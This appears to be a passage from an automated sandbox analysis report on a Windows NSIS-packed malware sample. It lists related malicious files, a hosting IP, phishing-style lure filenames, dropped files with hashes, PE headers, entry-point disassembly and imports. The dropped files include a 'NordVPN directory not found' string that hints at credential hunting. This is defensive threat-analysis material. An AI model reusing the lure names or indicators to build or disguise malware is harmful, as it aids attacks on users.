                                      HOSTINET_ASES | Justificante de Transferencia.exe | malicious | 185.101.224.45
                                      HOSTINET_ASES | SecuriteInfo.com.TrojanDownloader.Win32.GuLoader.05b6a4ab.12599.exe | malicious | 185.101.224.45
                                      HOSTINET_ASES | SecuriteInfo.com.TrojanDownloader.Win32.GuLoader.05b6a4ab.6220.exe | malicious | 185.101.224.45
                                      HOSTINET_ASES | SecuriteInfo.com.W32.Ninjector.CM.genEldorado.14602.exe | malicious | 185.101.224.45
                                      HOSTINET_ASES | side.exe | malicious | 185.101.224.45
                                      HOSTINET_ASES | Facturas DHL Parcel 46_008125.exe | malicious | 185.101.224.45
                                      HOSTINET_ASES | Facturas DHL Parcel 46_008125.exe | malicious | 185.101.224.45
                                      HOSTINET_ASES | BBVA-Confirming Facturas Pagadas al Vencimiento.exe | malicious | 185.101.224.45
                                      HOSTINET_ASES | ComprovativoExecu#U00e7#U00e3oTransfer#U00eancia.exe | malicious | 185.101.224.45
                                                                              Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                                              37f463bf4616ecd445d4a1937da06e19 | SecuriteInfo.com.Gen.Variant.Nemesis.8923.31381.exe | Detection: malicious
                                                                              Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                                              C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll
                                                                              • Filename: Handu Korean.exe, Detection: malicious
                                                                              • Filename: SecuriteInfo.com.Gen.Variant.Nemesis.8923.31381.exe, Detection: malicious
                                                                              • Filename: SecuriteInfo.com.Trojan.MSIL.Inject.10631.exe, Detection: malicious
                                                                              • Filename: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe, Detection: malicious
                                                                              • Filename: SecuriteInfo.com.Gen.Variant.Nemesis.8923.31381.exe, Detection: malicious
                                                                              • Filename: SecuriteInfo.com.Gen.Variant.Nemesis.8928.4279.exe, Detection: malicious
                                                                              • Filename: SecuriteInfo.com.Gen.Variant.Nemesis.8928.4279.exe, Detection: malicious
                                                                              • Filename: ORDER INQUIRY.exe, Detection: malicious
                                                                              • Filename: ORDER INQUIRY.exe, Detection: malicious
                                                                              • Filename: SecuriteInfo.com.W32.AIDetect.malware2.13948.exe, Detection: malicious
                                                                              • Filename: SecuriteInfo.com.W32.AIDetect.malware2.13948.exe, Detection: malicious
                                                                              • Filename: SecuriteInfo.com.W32.AIDetect.malware2.32239.exe, Detection: malicious
                                                                              • Filename: PqoFjHwVFk.exe, Detection: malicious
                                                                              • Filename: SecuriteInfo.com.W32.AIDetect.malware2.32239.exe, Detection: malicious
                                                                              • Filename: RFQ DC24a-MX.exe, Detection: malicious
                                                                              • Filename: PqoFjHwVFk.exe, Detection: malicious
                                                                              • Filename: RFQ DC24a-MX.exe, Detection: malicious
                                                                              • Filename: RFQ 37 - DR106305 - 5827764-ArcelorMittal.exe, Detection: malicious
                                                                              • Filename: RFQ 37 - DR106305 - 5827764-ArcelorMittal.exe, Detection: malicious
                                                                              • Filename: SecuriteInfo.com.W32.AIDetect.malware2.10956.exe, Detection: malicious
                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1391
                                                                                                                      Entropy (8bit):7.705940075877404
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                                                                      MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                                                                      SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                                                      SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                                                      SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                                                      Malicious:false
                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                      File Type:Microsoft Cabinet archive data, 61712 bytes, 1 file
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):61712
                                                                                                                      Entropy (8bit):7.995044632446497
                                                                                                                      Encrypted:true
                                                                                                                      SSDEEP:1536:gzjJiDImMsrjCtGLaexX/zL09mX/lZHIxs:gPJiDI/sr0Hexv/0S/zx
                                                                                                                      MD5:589C442FC7A0C70DCA927115A700D41E
                                                                                                                      SHA1:66A07DACE3AFBFD1AA07A47E6875BEAB62C4BB31
                                                                                                                      SHA-256:2E5CB72E9EB43BAAFB6C6BFCC573AAC92F49A8064C483F9D378A9E8E781A526A
                                                                                                                      SHA-512:1B5FA79E52BE495C42CF49618441FB7012E28C02E7A08A91DA9213DB3AB810F0E83485BC1DD5F625A47D0BA7CFCDD5EA50ACC9A8DCEBB39F048C40F01E94155B
                                                                                                                      Malicious:false
                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):192
                                                                                                                      Entropy (8bit):2.773803200765873
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:kkFklCsfJPtfllXlE/zMc9NtNNX8RolJuRdyo1dlUKlGXJlDdt:kKb+Q1bNMa8Rdy+UKcXP
                                                                                                                      MD5:36554B91BD91AE6F9093AEC7135ABC63
                                                                                                                      SHA1:0D2045C9FA93862996A7447EF109E4A1E7782F06
                                                                                                                      SHA-256:DD2032FEADEE236FD9DFE655F0D4F98DBBCB9E8D9429AAC1BF64E20A87E67395
                                                                                                                      SHA-512:9865FEFAF42F06F1E09B8D30D4CE18B4B131C88A6A7CF8F257F5838F83485DDDE6CE30E7CB02E18621FB2A14F898459E93DD1989BAAD3E2827DA52ECB95E518E
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview: [non-printable bytes] http://x1.i.lencr.org/ "5a62815c-56f"
                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                      File Type:data
                                                                                                                      Category:modified
                                                                                                                      Size (bytes):326
                                                                                                                      Entropy (8bit):3.1236216553575558
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6:kKm0+N+SkQlPlEGYRMY9z+4KlDA3RUeWlEZ21:u0NkPlE99SNxAhUeE1
                                                                                                                      MD5:1EEC5A770E5DE50B235105C9A7CBB230
                                                                                                                      SHA1:9AD713C57B559E061100C3CF37D5A8A95EA49173
                                                                                                                      SHA-256:1A6DD52EE40E30550E550D2B410B2F86DF9542C3FD9EE1FA86544C0B690B357B
                                                                                                                      SHA-512:99450DB2D063FA3073735C1CB714C24E100E02A6B48A677EAC5F32EA0DB9CAB37A530156F9B763F4AB7BB46A5917A5EE3A608C4A71EEA53CDD6622D6378D0505
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview: [non-printable bytes] http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab "09f4c9698bd81:0"
                                                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):12288
                                                                                                                      Entropy (8bit):5.814115788739565
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                                                                                                                      MD5:CFF85C549D536F651D4FB8387F1976F2
                                                                                                                      SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                                                                                                                      SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                                                                                                                      SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Joe Sandbox View:
                                                                                                                      • Filename: Handu Korean.exe, Detection: malicious, Browse
                                                                                                                      • Filename: SecuriteInfo.com.Gen.Variant.Nemesis.8923.31381.exe, Detection: malicious, Browse
                                                                                                                      • Filename: SecuriteInfo.com.Trojan.MSIL.Inject.10631.exe, Detection: malicious, Browse
                                                                                                                      • Filename: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe, Detection: malicious, Browse
                                                                                                                      • Filename: SecuriteInfo.com.Gen.Variant.Nemesis.8923.31381.exe, Detection: malicious, Browse
                                                                                                                      • Filename: SecuriteInfo.com.Gen.Variant.Nemesis.8928.4279.exe, Detection: malicious, Browse
                                                                                                                      • Filename: SecuriteInfo.com.Gen.Variant.Nemesis.8928.4279.exe, Detection: malicious, Browse
                                                                                                                      • Filename: ORDER INQUIRY.exe, Detection: malicious, Browse
                                                                                                                      • Filename: ORDER INQUIRY.exe, Detection: malicious, Browse
                                                                                                                      • Filename: SecuriteInfo.com.W32.AIDetect.malware2.13948.exe, Detection: malicious, Browse
                                                                                                                      • Filename: SecuriteInfo.com.W32.AIDetect.malware2.13948.exe, Detection: malicious, Browse
                                                                                                                      • Filename: SecuriteInfo.com.W32.AIDetect.malware2.32239.exe, Detection: malicious, Browse
                                                                                                                      • Filename: PqoFjHwVFk.exe, Detection: malicious, Browse
                                                                                                                      • Filename: SecuriteInfo.com.W32.AIDetect.malware2.32239.exe, Detection: malicious, Browse
                                                                                                                      • Filename: RFQ DC24a-MX.exe, Detection: malicious, Browse
                                                                                                                      • Filename: PqoFjHwVFk.exe, Detection: malicious, Browse
                                                                                                                      • Filename: RFQ DC24a-MX.exe, Detection: malicious, Browse
                                                                                                                      • Filename: RFQ 37 - DR106305 - 5827764-ArcelorMittal.exe, Detection: malicious, Browse
                                                                                                                      • Filename: RFQ 37 - DR106305 - 5827764-ArcelorMittal.exe, Detection: malicious, Browse
                                                                                                                      • Filename: SecuriteInfo.com.W32.AIDetect.malware2.10956.exe, Detection: malicious, Browse
                                                                                                                      Reputation:high, very likely benign file
                                                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 100x100, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=3], baseline, precision 8, 110x110, frames 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):5580
                                                                                                                      Entropy (8bit):7.8610675947118915
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:BSTzREFQkzwePWleSvZpEZSrqrf4uFV8TgV9tJQkzdTEwAeMhqD7n0:oXRFuWlzvZpEZSurdGyse48Mk0
                                                                                                                      MD5:556BED5FAA7C3E26C56BC9FCFC529723
                                                                                                                      SHA1:0D446CB0DAD1D8388F9422DDA12A6ECF0C81EB2E
                                                                                                                      SHA-256:A78B823495E0768D15C0E73424969485188B135D62DAC511B8FE531AA70F282A
                                                                                                                      SHA-512:4621DDC1BED6BA57776631B507783F410C14EAD87D9179D60A41E4E2504F7F1DF83C43EA49899E482151AC4C8940308E15CCDF371419AE8EB3EB538DEED9FC90
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):95398
                                                                                                                      Entropy (8bit):7.142865046210158
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:wTXy5OwFU5IzmvU6KCD411ASl2SRuPuDYpNpJrf7pDdp/L2d15ADB8+VNjiFg:wT0+5ISvpD411Z2SReuDWjdxC3Ad8+T
                                                                                                                      MD5:B3660ECDB5FC12143EA49E0C9AD5ED95
                                                                                                                      SHA1:757E5E938651F3FB1D17BD73E450A175211F75E0
                                                                                                                      SHA-256:F3DDEF2100688EEE45D1BBDB7CF698CE2E232CCAA6A5BD764E3B21B3CA84A6D3
                                                                                                                      SHA-512:CBF07D0DEF4D5D5AD3D462CA06475EB54A66468CEE956E01B8AF0DF843E486EBAD52C751A195B24F680AC8E451D62E1E401BE5333796E5169467C8CC11B20753
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe
                                                                                                                      File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):308
                                                                                                                      Entropy (8bit):6.786347589283681
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6:6v/lhPfh78KFJTKRqtJCKQtLVGhdNk2tbBEQtMtfp:6v/7XtzTQyJQKhdNNvESMtx
                                                                                                                      MD5:3D7D690C25A5E0D9AEA089BDC6C381FD
                                                                                                                      SHA1:466C54F12949AA0DF972D37FCAC03F51A59A7B6C
                                                                                                                      SHA-256:39F75FEF09B32BFB96A2F2989F7E200D421A82480FE13F54CFCFE0F88D86F14D
                                                                                                                      SHA-512:3A0382444F49029D4E25D83DCA58E57E99B2D541AE3863BE46776D6CCCD8A2E8DC20ED985B0F597E9BFC0B4E73FC42A02B3541A27B4AB4E92955F69DCF0D3FCA
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe
                                                                                                                      File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):238
                                                                                                                      Entropy (8bit):6.633113725010705
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6:6v/lhPysTQAt09hY3OT5K1kmQ/BS4GwsRE5fkt8up:6v/7NG9eM5KzQ/BSLvEdm8c
                                                                                                                      MD5:4A59AABC67F76907B51FF2E4CCF26074
                                                                                                                      SHA1:451F062644DB800453D9CA0FBE0EE53C58AEBFF0
                                                                                                                      SHA-256:60F1A6D45B16A0F76F7E3BAA683D506F2B6DD021EA25C32EB6871DD4FC7B9E12
                                                                                                                      SHA-512:8728198DDB40BF76EC49DFF42242D82C518FD2568E37F011A3C6727595F5AF14E743749683AE5C96D783EE9CE91480EC40453F092F72988D718BA231E6D8FEEB
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe
                                                                                                                      File Type:PNG image data, 16 x 16, 8-bit colormap, non-interlaced
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):622
                                                                                                                      Entropy (8bit):6.99329932907151
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:6v/7X0Z7HBwN1+swFIz8NqwnN14LBHFbSj50iFFp2fpws8A3L0OCV1uOk1:C0BqExqQ6BlsqiQhZrN041
                                                                                                                      MD5:D801F277C4062AE10A011ADC20D4A6D7
                                                                                                                      SHA1:49C7426ACC24711EBAEF5FE5EBD220735F3AB91D
                                                                                                                      SHA-256:0247A2133037B10E3EDD2AA85773AEFA06483CB76171675BC331A844C275F925
                                                                                                                      SHA-512:E0753F8BC9B5D02E9ABFCA7088337CA8BE4ED3654071606EEA30BFBD6B82075B567886B9274BF744DC73D1F06A2BB1DB151B1A250922758511CEA4B365F0ADFC
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):30
                                                                                                                      Entropy (8bit):3.964735178725505
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                                                                                                                      MD5:9F754B47B351EF0FC32527B541420595
                                                                                                                      SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                                                                                                                      SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                                                                                                                      SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                                                                                                                      Malicious:false
                                                                                                                      Preview:NordVPN directory not found!..
                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                      Entropy (8bit):5.570138438525555
                                                                                                                      TrID:
                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                      File name:SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe
                                                                                                                      File size:471150
                                                                                                                      MD5:6164a2f75a0c585d3256faecac344573
                                                                                                                      SHA1:684171a971270ecef4e56293f7808e5989989d1d
                                                                                                                      SHA256:c5e737000bb35f513800bfa5a9efd5c43a5771f1ae77fe4d4284a25111d4f9c8
                                                                                                                      SHA512:b2eb58fd7bee2542eb9c88165ab5246bdd247d146ca4db4a9d6adf703e436ddc2044612a0378e2e88fab1ed3b795d48a897b82c5716b447e2ff0a42be338fa4f
                                                                                                                      SSDEEP:6144:xbE/HUd5+xj6TjiyAKV1QDU4CqAhoJeoeRScTlkMek3bh2eMPwjz/8nO8NOe:xbiRJWVODU4FKPdRSCTeof5zK
                                                                                                                      TLSH:40A4BFA4BF9FBC82E5550E3492B0FA7811597C394E6F0913B6563F9E783214B9A2430F
                                                                                                                      Icon Hash:01787266eaabea61
                                                                                                                      Entrypoint:0x40352d
                                                                                                                      Entrypoint Section:.text
                                                                                                                      Digitally signed:false
                                                                                                                      Imagebase:0x400000
                                                                                                                      Subsystem:windows gui
                                                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                      Time Stamp:0x614F9B5A [Sat Sep 25 21:57:46 2021 UTC]
                                                                                                                      TLS Callbacks:
                                                                                                                      CLR (.Net) Version:
                                                                                                                      OS Version Major:4
                                                                                                                      OS Version Minor:0
                                                                                                                      File Version Major:4
                                                                                                                      File Version Minor:0
                                                                                                                      Subsystem Version Major:4
                                                                                                                      Subsystem Version Minor:0
                                                                                                                      Import Hash:56a78d55f3f7af51443e58e0ce2fb5f6
                                                                                                                      Instruction
                                                                                                                      push ebp
                                                                                                                      mov ebp, esp
                                                                                                                      sub esp, 000003F4h
                                                                                                                      push ebx
                                                                                                                      push esi
                                                                                                                      push edi
                                                                                                                      push 00000020h
                                                                                                                      pop edi
                                                                                                                      xor ebx, ebx
                                                                                                                      push 00008001h
                                                                                                                      mov dword ptr [ebp-14h], ebx
                                                                                                                      mov dword ptr [ebp-04h], 0040A2E0h
                                                                                                                      mov dword ptr [ebp-10h], ebx
                                                                                                                      call dword ptr [004080CCh]
                                                                                                                      mov esi, dword ptr [004080D0h]
                                                                                                                      lea eax, dword ptr [ebp-00000140h]
                                                                                                                      push eax
                                                                                                                      mov dword ptr [ebp-0000012Ch], ebx
                                                                                                                      mov dword ptr [ebp-2Ch], ebx
                                                                                                                      mov dword ptr [ebp-28h], ebx
                                                                                                                      mov dword ptr [ebp-00000140h], 0000011Ch
                                                                                                                      call esi
                                                                                                                      test eax, eax
                                                                                                                      jne 00007FA81C98A45Ah
                                                                                                                      lea eax, dword ptr [ebp-00000140h]
                                                                                                                      mov dword ptr [ebp-00000140h], 00000114h
                                                                                                                      push eax
                                                                                                                      call esi
                                                                                                                      mov ax, word ptr [ebp-0000012Ch]
                                                                                                                      mov ecx, dword ptr [ebp-00000112h]
                                                                                                                      sub ax, 00000053h
                                                                                                                      add ecx, FFFFFFD0h
                                                                                                                      neg ax
                                                                                                                      sbb eax, eax
                                                                                                                      mov byte ptr [ebp-26h], 00000004h
                                                                                                                      not eax
                                                                                                                      and eax, ecx
                                                                                                                      mov word ptr [ebp-2Ch], ax
                                                                                                                      cmp dword ptr [ebp-0000013Ch], 0Ah
                                                                                                                      jnc 00007FA81C98A42Ah
                                                                                                                      and word ptr [ebp-00000132h], 0000h
                                                                                                                      mov eax, dword ptr [ebp-00000134h]
                                                                                                                      movzx ecx, byte ptr [ebp-00000138h]
                                                                                                                      mov dword ptr [00434FB8h], eax
                                                                                                                      xor eax, eax
                                                                                                                      mov ah, byte ptr [ebp-0000013Ch]
                                                                                                                      movzx eax, ax
                                                                                                                      or eax, ecx
                                                                                                                      xor ecx, ecx
                                                                                                                      mov ch, byte ptr [ebp-2Ch]
                                                                                                                      movzx ecx, cx
                                                                                                                      shl eax, 10h
                                                                                                                      or eax, ecx
                                                                                                                      Programming Language:
                                                                                                                      • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8610 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc0000 | 0x543c8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6897 | 0x6a00 | False | 0.6661261792452831 | data | 6.458398214928006 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x14a6 | 0x1600 | False | 0.4392755681818182 | data | 5.024109281264143 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x2b018 | 0x600 | False | 0.521484375 | data | 4.15458210408643 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x36000 | 0x8a000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc0000 | 0x543c8 | 0x54400 | False | 0.3847395446958457 | data | 4.4894638245550915 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

| Name | RVA | Size | Type | Language | Country |
|---|---|---|---|---|---|
| RT_ICON | 0xc05f8 | 0x42028 | dBase IV DBT, blocks size 0, block length 8192, next free block index 40, next free block 13824, next used block 0 | English | United States |
| RT_ICON | 0x102620 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 4294967295 | English | United States |
| RT_ICON | 0x106848 | 0x25a8 | data | English | United States |
| RT_ICON | 0x108df0 | 0x1a68 | data | English | United States |
| RT_ICON | 0x10a858 | 0x1628 | dBase IV DBT of \200.DBF, blocks size 0, block length 4096, next free block index 40, next free block 2988225716, next used block 3402812106 | English | United States |
| RT_ICON | 0x10be80 | 0x10a8 | data | English | United States |
| RT_ICON | 0x10cf28 | 0xea8 | data | English | United States |
| RT_ICON | 0x10ddd0 | 0xba8 | data | English | United States |
| RT_ICON | 0x10e978 | 0xa68 | dBase IV DBT of \200.DBF, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0 | English | United States |
| RT_ICON | 0x10f3e0 | 0x988 | data | English | United States |
| RT_ICON | 0x10fd68 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 14455685, next used block 16228229 | English | United States |
| RT_ICON | 0x110610 | 0x810 | data | English | United States |
| RT_ICON | 0x110e20 | 0x6c8 | data | English | United States |
| RT_ICON | 0x1114e8 | 0x690 | data | English | United States |
| RT_ICON | 0x111b78 | 0x668 | data | English | United States |
| RT_ICON | 0x1121e0 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States |
| RT_ICON | 0x112748 | 0x4c8 | data | English | United States |
| RT_ICON | 0x112c10 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States |
| RT_ICON | 0x113078 | 0x2e8 | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 483465, next used block 0 | English | United States |
| RT_ICON | 0x113360 | 0x1e8 | data | English | United States |
| RT_ICON | 0x113548 | 0x1c8 | data | English | United States |
| RT_ICON | 0x113710 | 0x128 | GLS_BINARY_LSB_FIRST | English | United States |
| RT_DIALOG | 0x113838 | 0x100 | data | English | United States |
| RT_DIALOG | 0x113938 | 0x11c | data | English | United States |
| RT_DIALOG | 0x113a58 | 0xc4 | data | English | United States |
| RT_DIALOG | 0x113b20 | 0x60 | data | English | United States |
| RT_GROUP_ICON | 0x113b80 | 0x13a | data | English | United States |
| RT_VERSION | 0x113cc0 | 0x3c4 | data | English | United States |
| RT_MANIFEST | 0x114088 | 0x33e | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States |

| DLL | Import |
|---|---|
| ADVAPI32.dll | RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW |
| SHELL32.dll | SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW |
| ole32.dll | OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree |
| COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked |
| USER32.dll | GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu |
| GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject |
| KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW |

| Language of compilation system | Country where language is spoken | Map |
|---|---|---|
| English | United States | |

| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
